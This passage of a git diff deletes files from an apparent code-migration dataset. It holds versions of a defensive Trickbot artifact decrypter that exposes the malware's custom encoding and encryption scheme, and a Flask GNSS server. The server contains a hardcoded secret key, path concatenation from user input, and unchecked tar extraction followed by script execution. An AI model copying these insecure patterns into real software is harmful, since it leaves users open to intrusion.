asyncio.new_event_loop() - asyncio.set_event_loop(loop) - rtm_client = RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff deleted file mode 100644 index 21cbbc6..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff +++ /dev/null @@ -1,43 +0,0 @@ -diff --git a/trickbot/trickbot_artifact_decrypter.py b/trickbot/trickbot_artifact_decrypter.py - index e832d724b5f7af7a734815796de8eea919de1635..02b064b4acc0ae26d6c61246ab3f1f45b750091a 100644 - --- a/trickbot/trickbot_artifact_decrypter.py - +++ b/trickbot/trickbot_artifact_decrypter.py -@@ -7,11 +7,11 @@ import os - import struct - import sys - --# run "python3 -m pip install -r requirements.txt" if you are missing these --from Crypto.Cipher import AES --from Crypto.Hash import SHA256, SHA384 --from Crypto.PublicKey import ECC --from Crypto.Signature import DSS -+# run "sudo -H python3 -m pip install -r requirements.txt" if you are missing these -+from Cryptodome.Cipher import AES -+from Cryptodome.Hash import SHA256, SHA384 -+from Cryptodome.PublicKey import ECC -+from Cryptodome.Signature import DSS - - logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) - log = logging.getLogger() -@@ -162,12 +162,15 @@ def probe_config_file(filepath, dumpdir): - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: -- log.info(' [+] Group tag: %r', group_tag) -- log.info(' [+] Client ID: %r', client_id) -- log.info(' [+] Configuration: %r', config.decode()) -- with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: -- f.write(config) -- return bot_key -+ break -+ -+ if group_tag and client_id and config: -+ log.info(' [+] Group tag: %r', group_tag) -+ log.info(' [+] Client ID: %r', client_id) -+ log.info(' [+] Configuration: %r', config.decode()) -+ with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: -+ f.write(config) -+ return bot_key - - return None - diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py deleted file mode 100644 index e0e68e2..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py +++ /dev/null @@ -1,286 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import base64 -import itertools -import logging -import os -import struct -import sys - -# run "python3 -m pip install -r requirements.txt" if you are missing these -from Crypto.Cipher import AES -from Crypto.Hash import SHA256, SHA384 -from Crypto.PublicKey import ECC -from Crypto.Signature import DSS - -logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) -log = logging.getLogger() - -BASE64_STANDARD = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -BASE64_CUSTOM = b'HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT' - -ECC_KEY = '''-----BEGIN PUBLIC KEY----- -MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE8yCG2yBN8HM3tfsYsMCvgLvz+/FKwDvG -AB8j7xxMBlSjj6YZfEFX6wu8f0GhWHlwDcOhOBxe4nrRKfu2VUHVjsfHPh7ztGdj -01D1W1/RwFa4OIfbtUTX4Th5PmMrAy7I ------END PUBLIC KEY----- -''' - -verifier = DSS.new(ECC.import_key(ECC_KEY), 'fips-186-3') - - -def derive_key(rounds, data): - h = SHA256.new() - for _ in range(rounds): - h.update(data) - data = h.digest() - return data - - -def decrypt_data(data): - if data is None: - return None - - key = derive_key(128, data[:0x20])[:0x20] - iv = derive_key(128, data[0x10:0x30])[:0x10] - cipher = AES.new(key, AES.MODE_CBC, iv) - - def pad(s): - return s + (-len(s) % 16) * bytes([-len(s) % 16]) - - data = pad(data[0x30:]) - data = cipher.decrypt(data) - - if len(data) >= 8: - size, _ = struct.unpack_from('=II', data) - signature = data[size+0x08:size+0x68] - data = data[:size+0x08] - try: - verifier.verify(SHA384.new(data), signature) - except ValueError: - log.warning('[!] WARNING: Bad public key signature') - data = data[0x08:] - - return data - - -def xor(data, key): - return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))]) - - -def calc_checksum(data): - x = 0 - for b in data: - x = (x + b) & 0xffffffff - x = (x + ((x << 10) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 6) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 3) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 11) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 15) & 0xffffffff)) & 0xffffffff - return x - - -def base64_encode(data, alphabet): - return base64.b64encode(data).translate(bytes.maketrans(BASE64_STANDARD, alphabet)).rstrip(b'=') - - -def base64_decode(data, alphabet): - return base64.b64decode((data + b'==').translate(bytes.maketrans(alphabet, BASE64_STANDARD))) - - -def find_b64alphabet(data): - b64alphabet = bytearray(BASE64_CUSTOM) - - for i in itertools.permutations(b64alphabet[-9:]): - b64alphabet[-9:] = bytearray(i) - x = base64_decode(data, b64alphabet) - if len(x) <= 64: - continue - - items = x.split(b' ') - if len(items) != 5: - continue - if len(items[0]) != 64: - continue - if not all(_ in b'0123456789ABCDEF' for _ in items[0]): - continue - if not all(_ in b'0123456789' for _ in items[1]): - continue - if not all(_ in b'0123456789' for _ in items[2]): - continue - if not all(_ in b'0123456789' for _ in items[3]): - continue - if not all(_ in b'0123456789' for _ in items[4]): - continue - - if int(items[1]) != calc_checksum(base64_encode(bytes(range(256)), b64alphabet)): - continue - - return bytes(b64alphabet), items[0], int(items[2]), int(items[3]), int(items[4]) - - return None - - -def probe_config_file(filepath, dumpdir): - group_tag = None - client_id = None - config = None - - items = None - b64alphabet = None - bot_key = None - ln_group_tag = None - ln_client_id = None - ln_config = None - - linenum = 0 - with open(filepath, 'rb') as f: - for line in f: - linenum += 1 - line = line.strip().split(b'=', 1)[-1].translate(None, b' ') - if not all(_ in (BASE64_STANDARD + b'=') for _ in line): - continue - - if not items: - if len(line) < 96: - continue - items = find_b64alphabet(line) - if not items: - continue - b64alphabet, bot_key, ln_group_tag, ln_client_id, ln_config = items - log.info('[+] Found config file: %r', filepath) - log.info(' [+] Base64 alphabet: %r', b64alphabet.decode()) - log.info(' [+] Bot ID: %r', bot_key.decode()) - linenum = 0 - elif linenum == ln_group_tag: - data = xor(base64_decode(line, b64alphabet), bot_key) - group_tag = data.decode('utf-16le') - elif linenum == ln_client_id: - data = xor(base64_decode(line, b64alphabet), bot_key) - client_id = data.decode('utf-16le') - elif linenum == ln_config: - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: - log.info(' [+] Group tag: %r', group_tag) - log.info(' [+] Client ID: %r', client_id) - log.info(' [+] Configuration: %r', config.decode()) - with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: - f.write(config) - return bot_key - - return None - - -def decrypt_module_configs(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - - log.info('[+] Found module config: %r', path) - - outfile = os.path.join(dumpdir, '{}_{}.xml'.format(os.path.basename(directory).rsplit('_', 1)[0], entry)) - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def decrypt_modules(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - if not entry.endswith(('32', '64')): - continue - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - if not decrypted.startswith(b'MZ'): - continue - - log.info('[+] Found module binary: %r', path) - - outfile = os.path.join(dumpdir, entry + '.dll') - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - try: - numfiles += decrypt_module_configs(bot_key, os.path.join(directory, entry + '_configs'), dumpdir) - except FileNotFoundError: - continue - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def main(): - parser = argparse.ArgumentParser(description='Decrypts and dumps various artifacts (current configuration, modules and module configurations) from a computer infected with Trickbot') - parser.add_argument('directory', nargs='?', default='.', help='Trickbot malware directory') - parser.add_argument('-d', '--dumpdir', default='decrypted', help='Dump directory for the decrypted files') - args = parser.parse_args() - - args.dumpdir = os.path.abspath(args.dumpdir) - os.makedirs(args.dumpdir, exist_ok=True) - - numfiles = 0 - bot_key = None - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isfile(path): - continue - if os.path.samefile(path, sys.argv[0]): - continue - - log.info('[?] Probing config file: %r', path) - bot_key = probe_config_file(path, args.dumpdir) - if bot_key: - numfiles += 1 - break - - if not bot_key: - log.error('[!] ERROR: Failed to find bot key') - return - - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isdir(path): - continue - if os.path.samefile(path, args.dumpdir): - continue - - try: - numfiles += decrypt_modules(bot_key, path, args.dumpdir) - break - except FileNotFoundError: - continue - - if numfiles > 0: - log.info('[+] Saved %d decrypted file(s) to: %r', numfiles, args.dumpdir) - else: - log.error('[!] ERROR: Failed to decrypt any files') - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py deleted file mode 100644 index 7d824e7..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py +++ /dev/null @@ -1,289 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import base64 -import itertools -import logging -import os -import struct -import sys - -# run "sudo -H python3 -m pip install -r requirements.txt" if you are missing these -from Cryptodome.Cipher import AES -from Cryptodome.Hash import SHA256, SHA384 -from Cryptodome.PublicKey import ECC -from Cryptodome.Signature import DSS - -logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) -log = logging.getLogger() - -BASE64_STANDARD = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -BASE64_CUSTOM = b'HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT' - -ECC_KEY = '''-----BEGIN PUBLIC KEY----- -MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE8yCG2yBN8HM3tfsYsMCvgLvz+/FKwDvG -AB8j7xxMBlSjj6YZfEFX6wu8f0GhWHlwDcOhOBxe4nrRKfu2VUHVjsfHPh7ztGdj -01D1W1/RwFa4OIfbtUTX4Th5PmMrAy7I ------END PUBLIC KEY----- -''' - -verifier = DSS.new(ECC.import_key(ECC_KEY), 'fips-186-3') - - -def derive_key(rounds, data): - h = SHA256.new() - for _ in range(rounds): - h.update(data) - data = h.digest() - return data - - -def decrypt_data(data): - if data is None: - return None - - key = derive_key(128, data[:0x20])[:0x20] - iv = derive_key(128, data[0x10:0x30])[:0x10] - cipher = AES.new(key, AES.MODE_CBC, iv) - - def pad(s): - return s + (-len(s) % 16) * bytes([-len(s) % 16]) - - data = pad(data[0x30:]) - data = cipher.decrypt(data) - - if len(data) >= 8: - size, _ = struct.unpack_from('=II', data) - signature = data[size+0x08:size+0x68] - data = data[:size+0x08] - try: - verifier.verify(SHA384.new(data), signature) - except ValueError: - log.warning('[!] WARNING: Bad public key signature') - data = data[0x08:] - - return data - - -def xor(data, key): - return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))]) - - -def calc_checksum(data): - x = 0 - for b in data: - x = (x + b) & 0xffffffff - x = (x + ((x << 10) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 6) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 3) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 11) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 15) & 0xffffffff)) & 0xffffffff - return x - - -def base64_encode(data, alphabet): - return base64.b64encode(data).translate(bytes.maketrans(BASE64_STANDARD, alphabet)).rstrip(b'=') - - -def base64_decode(data, alphabet): - return base64.b64decode((data + b'==').translate(bytes.maketrans(alphabet, BASE64_STANDARD))) - - -def find_b64alphabet(data): - b64alphabet = bytearray(BASE64_CUSTOM) - - for i in itertools.permutations(b64alphabet[-9:]): - b64alphabet[-9:] = bytearray(i) - x = base64_decode(data, b64alphabet) - if len(x) <= 64: - continue - - items = x.split(b' ') - if len(items) != 5: - continue - if len(items[0]) != 64: - continue - if not all(_ in b'0123456789ABCDEF' for _ in items[0]): - continue - if not all(_ in b'0123456789' for _ in items[1]): - continue - if not all(_ in b'0123456789' for _ in items[2]): - continue - if not all(_ in b'0123456789' for _ in items[3]): - continue - if not all(_ in b'0123456789' for _ in items[4]): - continue - - if int(items[1]) != calc_checksum(base64_encode(bytes(range(256)), b64alphabet)): - continue - - return bytes(b64alphabet), items[0], int(items[2]), int(items[3]), int(items[4]) - - return None - - -def probe_config_file(filepath, dumpdir): - group_tag = None - client_id = None - config = None - - items = None - b64alphabet = None - bot_key = None - ln_group_tag = None - ln_client_id = None - ln_config = None - - linenum = 0 - with open(filepath, 'rb') as f: - for line in f: - linenum += 1 - line = line.strip().split(b'=', 1)[-1].translate(None, b' ') - if not all(_ in (BASE64_STANDARD + b'=') for _ in line): - continue - - if not items: - if len(line) < 96: - continue - items = find_b64alphabet(line) - if not items: - continue - b64alphabet, bot_key, ln_group_tag, ln_client_id, ln_config = items - log.info('[+] Found config file: %r', filepath) - log.info(' [+] Base64 alphabet: %r', b64alphabet.decode()) - log.info(' [+] Bot ID: %r', bot_key.decode()) - linenum = 0 - elif linenum == ln_group_tag: - data = xor(base64_decode(line, b64alphabet), bot_key) - group_tag = data.decode('utf-16le') - elif linenum == ln_client_id: - data = xor(base64_decode(line, b64alphabet), bot_key) - client_id = data.decode('utf-16le') - elif linenum == ln_config: - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: - break - - if group_tag and client_id and config: - log.info(' [+] Group tag: %r', group_tag) - log.info(' [+] Client ID: %r', client_id) - log.info(' [+] Configuration: %r', config.decode()) - with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: - f.write(config) - return bot_key - - return None - - -def decrypt_module_configs(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - - log.info('[+] Found module config: %r', path) - - outfile = os.path.join(dumpdir, '{}_{}.xml'.format(os.path.basename(directory).rsplit('_', 1)[0], entry)) - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def decrypt_modules(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - if not entry.endswith(('32', '64')): - continue - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - if not decrypted.startswith(b'MZ'): - continue - - log.info('[+] Found module binary: %r', path) - - outfile = os.path.join(dumpdir, entry + '.dll') - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - try: - numfiles += decrypt_module_configs(bot_key, os.path.join(directory, entry + '_configs'), dumpdir) - except FileNotFoundError: - continue - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def main(): - parser = argparse.ArgumentParser(description='Decrypts and dumps various artifacts (current configuration, modules and module configurations) from a computer infected with Trickbot') - parser.add_argument('directory', nargs='?', default='.', help='Trickbot malware directory') - parser.add_argument('-d', '--dumpdir', default='decrypted', help='Dump directory for the decrypted files') - args = parser.parse_args() - - args.dumpdir = os.path.abspath(args.dumpdir) - os.makedirs(args.dumpdir, exist_ok=True) - - numfiles = 0 - bot_key = None - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isfile(path): - continue - if os.path.samefile(path, sys.argv[0]): - continue - - log.info('[?] Probing config file: %r', path) - bot_key = probe_config_file(path, args.dumpdir) - if bot_key: - numfiles += 1 - break - - if not bot_key: - log.error('[!] ERROR: Failed to find bot key') - return - - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isdir(path): - continue - if os.path.samefile(path, args.dumpdir): - continue - - try: - numfiles += decrypt_modules(bot_key, path, args.dumpdir) - break - except FileNotFoundError: - continue - - if numfiles > 0: - log.info('[+] Saved %d decrypted file(s) to: %r', numfiles, args.dumpdir) - else: - log.error('[!] ERROR: Failed to decrypt any files') - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff deleted file mode 100644 index 307a147..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/web_app/server.py b/web_app/server.py - index 6ad29b4c76efe010320662d0dc360ca62b583366..a4c347a2ede5fba1d0e787193b7dc4079ab4fd6f 100644 - --- a/web_app/server.py - +++ b/web_app/server.py -@@ -23,10 +23,10 @@ - # You should have received a copy of the GNU General Public License - # along with ReachView. If not, see . - --#from gevent import monkey --#monkey.patch_all() --import eventlet --eventlet.monkey_patch() -+from gevent import monkey -+monkey.patch_all() -+#import eventlet -+#eventlet.monkey_patch() - - import time - import json diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py deleted file mode 100644 index 1ca5253..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py +++ /dev/null @@ -1,463 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -#from gevent import monkey -#monkey.patch_all() -import eventlet -eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = True -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password is not "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state is not "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=False): - """ - check if an update exists - """ - new_release = None - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - new_release = None - socketio.emit("new release", new_release, namespace="/test") - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update().get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(3) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - 